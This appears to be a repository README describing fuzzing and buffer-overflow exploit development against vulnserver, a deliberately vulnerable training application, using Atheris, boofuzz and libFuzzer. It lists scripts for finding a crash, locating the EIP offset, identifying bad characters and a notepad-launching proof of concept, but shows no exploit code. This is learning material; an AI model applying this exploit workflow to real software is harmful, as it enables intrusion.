The following repo contains some exploit scripts for the vulnserver application.
First attempt I used Atheris. See the atheris folder for the script and some crashes verified found by the fuzzer.
- Install Atheris:
pip install atheris==2.0.7
- I used
atherisin the past, that's why I chose it. - Atheris is a bit pointless here, since there is no instrumentation to guide the fuzzer. It's just a dumb fuzzer.
- It feels a bit time-consuming to setup the connection each time and send the payload.
- Ideally fuzzing with instrumentation would be better?
Mostly derived from the h0mbre's blog post.
Contains the boofuzz script to identify the memory access violation using the TRUN command. The folder contains multiple scripts / steps to come up with a final poc:
main.py: The main script to fuzz the target and identify the crash.exploit.py: The script that trigger the crash using the string derived from the fuzzing.identify_EIP.py: The script to identify the EIP offset it pass a unique string so we can get the offset of the EIP.verify_EIP_overflow.py: The script to verify the EIP overflow using the sequence of repeated chars for identify all the offset.identify_bad_chars.py: The script to identify the badchars so that we can exclude them from the payload.poc.py: The proof of concept to exploit the target by running a notepad session on the local machine each time.
- Install Boofuzz:
pip install boofuzz.
- I didn't know Boofuzz before, I read about that in the h0mbre's blog post.
- Similar approach to the one above. Just setup a connection and send the payload.
- Compile using:
clang++ -fsanitize=address,fuzzer -o vulnserver_fuzzer fuzzing_vulnserver.cpp - Run using:
vulnserver_fuzzer -fork=5 -ignore_crashes=1
- Testing only
Function1,Function2andFunction3. - Since we instrument the target then we can have a reliable coverage metric.